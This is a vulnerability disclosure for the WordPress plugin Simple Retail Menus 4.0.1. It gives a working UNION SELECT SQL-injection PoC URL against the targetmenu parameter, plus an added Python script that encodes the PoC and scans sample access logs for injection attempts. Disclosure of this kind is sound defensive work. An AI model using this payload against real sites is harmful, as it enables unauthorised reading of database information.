wp-plugin : simple-retail-menus

Plugin Details
Plugin Name: wp-plugin : simple-retail-menus
Affected Version : 4.0.1 (and most probably lower versions, if any)
Vulnerability : SQL Injection (unsanitised parameter concatenated into a database query; the PoC below uses a UNION SELECT to read server-side values)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Editor
PoC - (Proof of Concept) : issued from a browser session logged in with at least Editor privileges; the browser URL-encodes the spaces in the payload, and the injected UNION SELECT supplies eight columns so that @@version, user() and database() are returned in place of the requested menu record:

http://localhost/wp-admin/admin.php?page=jsrm-retail-menus&mode=edit&targetmenu=2 union select @@version,2,user(),database(),5,6,7,8

Vulnerable Parameter : targetmenu (expected to be a numeric menu id; a non-numeric value is passed straight through to the query)

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=861170%40simple-retail-menus&old=728969%40simple-retail-menus&sfp_email=&sfph_mail=#file1
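The following Python script is an added example and is not part of the advisory or of the plugin. It rebuilds the PoC above as a properly URL-encoded request (so the payload can be compared byte-for-byte against what a web server logs) and scans access-log lines for requests to the plugin's admin page whose targetmenu value is not a plain menu id. The log lines, the client addresses and the base URL http://localhost are constructed for illustration.

```python
"""Added example (not the plugin's code): encode the advisory's PoC and
detect attempts against the `targetmenu` parameter in access logs."""
import re
from urllib.parse import parse_qs, urlencode, urlparse

WP_BASE = "http://localhost"          # assumed target, as in the advisory's PoC
PLUGIN_PAGE = "jsrm-retail-menus"     # admin page name from the PoC URL

# Common/combined log format; the request path is matched non-greedily so that
# a raw request containing literal spaces (as in the PoC) still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>.*?) HTTP/[\d.]+" (?P<status>\d+) \S+'
)
# Tokens that mark an injection attempt rather than a merely malformed id.
SQL_TOKENS = re.compile(r"\b(union|select|sleep|benchmark)\b|['\"#]|--|/\*", re.I)


def build_poc_url(base=WP_BASE, columns=8):
    """Encode the advisory's PoC. The UNION must match the column count of the
    query the plugin runs; the advisory's payload uses 8 columns and places
    @@version, user() and database() in columns 1, 3 and 4."""
    cols = [str(i) for i in range(1, columns + 1)]
    cols[0], cols[2], cols[3] = "@@version", "user()", "database()"
    payload = "2 union select " + ",".join(cols)
    query = urlencode({"page": PLUGIN_PAGE, "mode": "edit", "targetmenu": payload})
    return f"{base}/wp-admin/admin.php?{query}"


def targetmenu_values(path):
    """Decoded targetmenu values of a request, only if it targets the plugin page."""
    qs = parse_qs(urlparse(path).query, keep_blank_values=True)
    if qs.get("page") != [PLUGIN_PAGE]:
        return []
    return qs.get("targetmenu", [])


def is_suspicious(value):
    """A legitimate targetmenu is a menu id: anything that is not all digits
    would reach the query unsanitised in the affected version."""
    return not value.isdigit()


def scan_access_log(lines):
    """Return one finding per request whose targetmenu is not a numeric id."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in targetmenu_values(m.group("path")):
            if is_suspicious(value):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": int(m.group("status")),
                    "targetmenu": value,
                    "sql_tokens": bool(SQL_TOKENS.search(value)),
                })
    return hits


# Constructed sample log: one normal edit, the encoded PoC, a single-quote
# probe, and an injection against an unrelated page (not attributed to the plugin).
SAMPLE_LOG = [
    '203.0.113.7 - - [28/May/2014:10:00:01 +0000] "GET /wp-admin/admin.php'
    '?page=jsrm-retail-menus&mode=edit&targetmenu=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [28/May/2014:10:00:09 +0000] "GET /wp-admin/admin.php'
    '?page=jsrm-retail-menus&mode=edit&targetmenu=2+union+select+%40%40version'
    '%2C2%2Cuser%28%29%2Cdatabase%28%29%2C5%2C6%2C7%2C8 HTTP/1.1" 200 5300',
    '198.51.100.4 - - [28/May/2014:10:01:00 +0000] "GET /wp-admin/admin.php'
    '?page=jsrm-retail-menus&mode=edit&targetmenu=2%27 HTTP/1.1" 500 0',
    '198.51.100.4 - - [28/May/2014:10:02:00 +0000] "GET /wp-admin/edit.php'
    '?targetmenu=1 union select 1 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    print(build_poc_url())
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The scan is scoped to page=jsrm-retail-menus because targetmenu is only meaningful to this plugin; the access log does not show whether the request carried an Editor session, so a hit with status 200 from a logged-in account is the case to triage first. Adjust LOG_RE if your server uses a different log format.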


Disclosure Timeline
Vendor Contacted : 2013-12-25
Plugin Status : Updated on 2014-02-19
Public Disclosure : 2014-05-28
CVE Number :
Plugin Description :
Perfect for salon, restaurant, and retail store websites, as well as many other applications. Simple Retail Menus lets you create and manage menu-type lists for display in a post or page. This is a free, full-featured plugin. Create as many menus as you want, add as many items as you want to any menu, add menus to any post or page on your WordPress site. It's simple and easy to use! Just build your menus, then copy/paste the resulting 'shortcode' into your post or page. Example of a shortcode: [simple-retail-menu id="1"]
Plugin's Official Site : http://whatwouldjessedo.com/simple-retail-menus/